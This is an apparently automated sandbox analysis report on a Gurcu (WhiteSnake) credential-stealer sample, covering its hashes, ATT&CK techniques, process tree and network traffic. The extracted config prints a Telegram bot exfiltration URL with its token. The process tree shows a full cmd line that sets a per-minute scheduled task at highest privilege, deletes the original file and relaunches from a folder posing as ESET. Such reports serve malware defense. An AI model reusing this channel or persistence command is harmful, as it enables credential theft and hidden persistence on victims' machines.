gurcu | 2c2d57d1ea08595db9a8a6c1bf8dbe40fac57a9b784eff00c4095c72fce80e98

Analysis

max time kernel
60s
max time network
126s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
25/05/2023, 21:13 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

599KB
MD5

fdb8081ac26d8de3f7582b2616bcf3e8
SHA1

c46856c1394a0b36f7826285db0d72ae494f15f0
SHA256

2c2d57d1ea08595db9a8a6c1bf8dbe40fac57a9b784eff00c4095c72fce80e98
SHA512

0fdaa8f7c6ce93026fa1ad2e18b0ad31cd0e77afc17763042e841b039a2a1130b4138f34a2d32d8e74bee347f26b40f36d224be8b7f4cd7c2f6917617ff60c98
SSDEEP

6144:kH5XgP9i7Nss/t/a2zDGVPJXvnzZjDJHb571Kjn1929XDccH89bq3vcebsVDsu:8UkRatpvnzZjDv7oj19yTN3vi1

Score

10^/10

gurcu spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot6237712604:AAESgAGfaQ0EUC8eWgMd7kpAW_FEGRDRfDs/sendMessage?chat_id=880824160

Signatures

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	tmp.exe

Executes dropped EXE 1 IoCs

pid	Process
564	tmp.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2196	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3944	PING.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	524	tmp.exe
Token: SeDebugPrivilege	564	tmp.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 524 wrote to memory of 4312	524	tmp.exe	84
PID 524 wrote to memory of 4312	524	tmp.exe	84
PID 4312 wrote to memory of 4000	4312	cmd.exe	86
PID 4312 wrote to memory of 4000	4312	cmd.exe	86
PID 4312 wrote to memory of 3944	4312	cmd.exe	87
PID 4312 wrote to memory of 3944	4312	cmd.exe	87
PID 4312 wrote to memory of 2196	4312	cmd.exe	88
PID 4312 wrote to memory of 2196	4312	cmd.exe	88
PID 4312 wrote to memory of 564	4312	cmd.exe	89
PID 4312 wrote to memory of 564	4312	cmd.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tmp" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\EsetSecurity\tmp.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\tmp.exe" &&START "" "C:\Users\Admin\AppData\Local\EsetSecurity\tmp.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4312
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:4000
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:3944
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "tmp" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\EsetSecurity\tmp.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2196
- - C:\Users\Admin\AppData\Local\EsetSecurity\tmp.exe
    "C:\Users\Admin\AppData\Local\EsetSecurity\tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:564

Network

DNS

84.150.43.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

84.150.43.20.in-addr.arpa

IN PTR

Response
DNS

youtube.kz

tmp.exe

Remote address:

8.8.8.8:53

Request

youtube.kz

IN A

Response

youtube.kz

IN A

142.251.39.110
DNS

google.kz

tmp.exe

Remote address:

8.8.8.8:53

Request

google.kz

IN A

Response

google.kz

IN A

142.250.179.132
DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

archive.torproject.org

tmp.exe

Remote address:

8.8.8.8:53

Request

archive.torproject.org

IN A

Response

archive.torproject.org

IN CNAME

archive-01.torproject.org

archive-01.torproject.org

IN A

159.69.63.226
DNS

twitter.com

tmp.exe

Remote address:

8.8.8.8:53

Request

twitter.com

IN A

Response

twitter.com

IN A

104.244.42.65
POST

http://google.kz/ILtcs2AdBv?208=1

tmp.exe

Remote address:

142.250.179.132:80

Request

POST /ILtcs2AdBv?208=1 HTTP/1.1
Host: google.kz
Content-Length: 208
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Thu, 25 May 2023 21:13:55 GMT
Connection: close
POST

http://twitter.com/UVE4rzhe8O?12=1

tmp.exe

Remote address:

104.244.42.65:80

Request

POST /UVE4rzhe8O?12=1 HTTP/1.1
Host: twitter.com
Content-Length: 12
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/UVE4rzhe8O?12=1
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 8c2e244b4709b639
x-response-time: 99
x-connection-hash: a580ce750d7965e95b582881d1c516bcec7c3c43c640d0e2495ca1e2299db1e4
date: Thu, 25 May 2023 21:13:55 GMT
server: tsa_o
POST

http://twitter.com/UVE4rzhe8O?12=1

tmp.exe

Remote address:

104.244.42.65:80

Request

POST /UVE4rzhe8O?12=1 HTTP/1.1
Host: twitter.com
Content-Length: 12
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/UVE4rzhe8O?12=1
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 90350c643c178738
x-response-time: 99
x-connection-hash: a580ce750d7965e95b582881d1c516bcec7c3c43c640d0e2495ca1e2299db1e4
date: Thu, 25 May 2023 21:13:56 GMT
server: tsa_o
POST

http://twitter.com/UVE4rzhe8O?12=1

tmp.exe

Remote address:

104.244.42.65:80

Request

POST /UVE4rzhe8O?12=1 HTTP/1.1
Host: twitter.com
Content-Length: 12
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/UVE4rzhe8O?12=1
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 1ce95571fe89285e
x-response-time: 105
x-connection-hash: a580ce750d7965e95b582881d1c516bcec7c3c43c640d0e2495ca1e2299db1e4
date: Thu, 25 May 2023 21:13:56 GMT
server: tsa_o
POST

http://twitter.com/UVE4rzhe8O?12=1

tmp.exe

Remote address:

104.244.42.65:80

Request

POST /UVE4rzhe8O?12=1 HTTP/1.1
Host: twitter.com
Content-Length: 12
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/UVE4rzhe8O?12=1
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 9cae3029d9da63f0
x-response-time: 99
x-connection-hash: a580ce750d7965e95b582881d1c516bcec7c3c43c640d0e2495ca1e2299db1e4
date: Thu, 25 May 2023 21:13:56 GMT
server: tsa_o
POST

http://twitter.com/UVE4rzhe8O?12=1

tmp.exe

Remote address:

104.244.42.65:80

Request

POST /UVE4rzhe8O?12=1 HTTP/1.1
Host: twitter.com
Content-Length: 12
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/UVE4rzhe8O?12=1
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 403d3e6ea2caafd4
x-response-time: 99
x-connection-hash: a580ce750d7965e95b582881d1c516bcec7c3c43c640d0e2495ca1e2299db1e4
date: Thu, 25 May 2023 21:13:57 GMT
server: tsa_o
POST

http://twitter.com/UVE4rzhe8O?12=1

tmp.exe

Remote address:

104.244.42.65:80

Request

POST /UVE4rzhe8O?12=1 HTTP/1.1
Host: twitter.com
Content-Length: 12
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/UVE4rzhe8O?12=1
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 1b1656aed83bc165
x-response-time: 104
x-connection-hash: 34c971a8fe08d8bcdcc3ed0bb865eb75e27a482bcc9bb565b1489cf869ce8ad1
date: Thu, 25 May 2023 21:13:55 GMT
server: tsa_o
POST

http://twitter.com/UVE4rzhe8O?12=1

tmp.exe

Remote address:

104.244.42.65:80

Request

POST /UVE4rzhe8O?12=1 HTTP/1.1
Host: twitter.com
Content-Length: 12
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/UVE4rzhe8O?12=1
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 6021eaf0d2bc1201
x-response-time: 100
x-connection-hash: 34c971a8fe08d8bcdcc3ed0bb865eb75e27a482bcc9bb565b1489cf869ce8ad1
date: Thu, 25 May 2023 21:13:55 GMT
server: tsa_o
POST

http://twitter.com/UVE4rzhe8O?12=1

tmp.exe

Remote address:

104.244.42.65:80

Request

POST /UVE4rzhe8O?12=1 HTTP/1.1
Host: twitter.com
Content-Length: 12
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/UVE4rzhe8O?12=1
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 7b640e70a79a8f0a
x-response-time: 105
x-connection-hash: 34c971a8fe08d8bcdcc3ed0bb865eb75e27a482bcc9bb565b1489cf869ce8ad1
date: Thu, 25 May 2023 21:13:56 GMT
server: tsa_o
POST

http://twitter.com/UVE4rzhe8O?12=1

tmp.exe

Remote address:

104.244.42.65:80

Request

POST /UVE4rzhe8O?12=1 HTTP/1.1
Host: twitter.com
Content-Length: 12
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/UVE4rzhe8O?12=1
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: d4e60106326a736d
x-response-time: 104
x-connection-hash: 34c971a8fe08d8bcdcc3ed0bb865eb75e27a482bcc9bb565b1489cf869ce8ad1
date: Thu, 25 May 2023 21:13:56 GMT
server: tsa_o
DNS

cyware.com

tmp.exe

Remote address:

8.8.8.8:53

Request

cyware.com

IN A

Response

cyware.com

IN A

3.33.180.61

cyware.com

IN A

15.197.166.200
GET

http://cyware.com/B4pzIQ4Epn?s=48

tmp.exe

Remote address:

3.33.180.61:80

Request

GET /B4pzIQ4Epn?s=48 HTTP/1.1
Host: cyware.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: awselb/2.0
Date: Thu, 25 May 2023 21:13:56 GMT
Content-Type: text/html
Content-Length: 134
Connection: keep-alive
Location: https://cyware.com:443/B4pzIQ4Epn?s=48
GET

http://google.kz/GRIkPKm2P5?s=69

tmp.exe

Remote address:

142.250.179.132:80

Request

GET /GRIkPKm2P5?s=69 HTTP/1.1
Host: google.kz

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Thu, 25 May 2023 21:13:56 GMT
DNS

132.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

132.179.250.142.in-addr.arpa

IN PTR

Response

132.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f41e100net
DNS

65.42.244.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

65.42.244.104.in-addr.arpa

IN PTR

Response
DNS

226.63.69.159.in-addr.arpa

Remote address:

8.8.8.8:53

Request

226.63.69.159.in-addr.arpa

IN PTR

Response

226.63.69.159.in-addr.arpa

IN PTR

archive-01 torprojectorg
DNS

61.180.33.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

61.180.33.3.in-addr.arpa

IN PTR

Response

61.180.33.3.in-addr.arpa

IN PTR

a911efccbe97eacddawsglobalacceleratorcom

142.250.179.132:80

google.kz

tmp.exe

98 B
52 B
2
1
142.251.39.110:80

youtube.kz

tmp.exe

98 B
52 B
2
1
142.250.179.132:80

http://google.kz/ILtcs2AdBv?208=1

http

tmp.exe

395 B
2.0kB
6
6

HTTP Request

POST http://google.kz/ILtcs2AdBv?208=1

HTTP Response

404
159.69.63.226:443

archive.torproject.org

tls

tmp.exe

685 B
5.7kB
9
10
104.244.42.65:80

http://twitter.com/UVE4rzhe8O?12=1

http

tmp.exe

1.3kB
2.8kB
17
21

HTTP Request

POST http://twitter.com/UVE4rzhe8O?12=1

HTTP Response

301

HTTP Request

POST http://twitter.com/UVE4rzhe8O?12=1

HTTP Response

301

HTTP Request

POST http://twitter.com/UVE4rzhe8O?12=1

HTTP Response

301

HTTP Request

POST http://twitter.com/UVE4rzhe8O?12=1

HTTP Response

301

HTTP Request

POST http://twitter.com/UVE4rzhe8O?12=1

HTTP Response

301
104.244.42.65:80

http://twitter.com/UVE4rzhe8O?12=1

http

tmp.exe

1.1kB
2.2kB
14
17

HTTP Request

POST http://twitter.com/UVE4rzhe8O?12=1

HTTP Response

301

HTTP Request

POST http://twitter.com/UVE4rzhe8O?12=1

HTTP Response

301

HTTP Request

POST http://twitter.com/UVE4rzhe8O?12=1

HTTP Response

301

HTTP Request

POST http://twitter.com/UVE4rzhe8O?12=1

HTTP Response

301
3.33.180.61:80

http://cyware.com/B4pzIQ4Epn?s=48

http

tmp.exe

305 B
517 B
5
4

HTTP Request

GET http://cyware.com/B4pzIQ4Epn?s=48

HTTP Response

301
142.250.179.132:80

http://google.kz/GRIkPKm2P5?s=69

http

tmp.exe

234 B
1.9kB
4
4

HTTP Request

GET http://google.kz/GRIkPKm2P5?s=69

HTTP Response

404
104.244.42.65:443

twitter.com

tls

tmp.exe

536 B
3.1kB
6
5
104.244.42.65:443

twitter.com

tls

tmp.exe

536 B
3.1kB
6
5
3.33.180.61:443

cyware.com

tls

tmp.exe

856 B
6.7kB
12
16
173.223.113.131:80

322 B
7

8.8.8.8:53

84.150.43.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

84.150.43.20.in-addr.arpa
8.8.8.8:53

youtube.kz

dns

tmp.exe

56 B
72 B
1
1

DNS Request

youtube.kz

DNS Response

142.251.39.110
8.8.8.8:53

google.kz

dns

tmp.exe

55 B
71 B
1
1

DNS Request

google.kz

DNS Response

142.250.179.132
8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

archive.torproject.org

dns

tmp.exe

68 B
109 B
1
1

DNS Request

archive.torproject.org

DNS Response

159.69.63.226
8.8.8.8:53

twitter.com

dns

tmp.exe

57 B
73 B
1
1

DNS Request

twitter.com

DNS Response

104.244.42.65
8.8.8.8:53

cyware.com

dns

tmp.exe

56 B
88 B
1
1

DNS Request

cyware.com

DNS Response

3.33.180.61

15.197.166.200
8.8.8.8:53

132.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

132.179.250.142.in-addr.arpa
8.8.8.8:53

65.42.244.104.in-addr.arpa

dns

72 B
72 B
1
1

DNS Request

65.42.244.104.in-addr.arpa
8.8.8.8:53

226.63.69.159.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

226.63.69.159.in-addr.arpa
8.8.8.8:53

61.180.33.3.in-addr.arpa

dns

70 B
126 B
1
1

DNS Request

61.180.33.3.in-addr.arpa

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\EsetSecurity\tmp.exe

Filesize
599KB

MD5
fdb8081ac26d8de3f7582b2616bcf3e8

SHA1
c46856c1394a0b36f7826285db0d72ae494f15f0

SHA256
2c2d57d1ea08595db9a8a6c1bf8dbe40fac57a9b784eff00c4095c72fce80e98

SHA512
0fdaa8f7c6ce93026fa1ad2e18b0ad31cd0e77afc17763042e841b039a2a1130b4138f34a2d32d8e74bee347f26b40f36d224be8b7f4cd7c2f6917617ff60c98

Download Submit
C:\Users\Admin\AppData\Local\EsetSecurity\tmp.exe

Filesize
599KB

MD5
fdb8081ac26d8de3f7582b2616bcf3e8

SHA1
c46856c1394a0b36f7826285db0d72ae494f15f0

SHA256
2c2d57d1ea08595db9a8a6c1bf8dbe40fac57a9b784eff00c4095c72fce80e98

SHA512
0fdaa8f7c6ce93026fa1ad2e18b0ad31cd0e77afc17763042e841b039a2a1130b4138f34a2d32d8e74bee347f26b40f36d224be8b7f4cd7c2f6917617ff60c98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\tmp.exe.log

Filesize
1KB

MD5
fc1be6f3f52d5c841af91f8fc3f790cb

SHA1
ac79b4229e0a0ce378ae22fc6104748c5f234511

SHA256
6da862f7c7feffca99cd58712ece93928c6ca6aed617f5d8c10a4718eaa2a910

SHA512
2f46165017309ee1a0c1b23e30a71e52e86ad8933e2649bf58c3f4628c5aa75659f5b8f6be32c2882f220b2f3ff2fd50d8766bf0a3708c94c2c634c051a05ea6

Download Submit
memory/524-133-0x000002174C170000-0x000002174C20A000-memory.dmp

Filesize
616KB

Download
memory/524-134-0x000002174C5D0000-0x000002174C5E0000-memory.dmp

Filesize
64KB

Download
memory/564-142-0x0000016BC83A0000-0x0000016BC83B0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.